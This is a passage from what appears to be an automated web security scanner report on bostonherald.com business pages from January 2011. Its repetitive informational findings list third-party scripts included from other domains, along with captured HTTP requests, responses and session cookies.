<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.597. http://www.bostonherald.com/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:20:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 79220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.598. http://www.bostonherald.com/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:20:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.599. http://www.bostonherald.com/business/automotive/view/20110128kia_motors_2010_net_profit_sales_hit_records/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/automotive/view/20110128kia_motors_2010_net_profit_sales_hit_records/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /business/automotive/view/20110128kia_motors_2010_net_profit_sales_hit_records/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:20:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.600. http://www.bostonherald.com/business/general/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/general/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=2&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE

Request

GET /business/general/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:09:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 60852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div style="float: left; background-color:#fff;width:175px; padding:20px 5px; margin:0px; height:260px; overflow:hidden;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=2&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.601. http://www.bostonherald.com/business/general/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/general/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

18.602. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:11:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 94735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.603. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:11:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44398

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.604. http://www.bostonherald.com/business/general/view/20110128report_massachusetts_economic_growth_slowed_in_fourth_quarter/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/general/view/20110128report_massachusetts_economic_growth_slowed_in_fourth_quarter/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /business/general/view/20110128report_massachusetts_economic_growth_slowed_in_fourth_quarter/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:12:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.605. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6 previous next

Summary

Severity:	Information
Confidence:	Certain
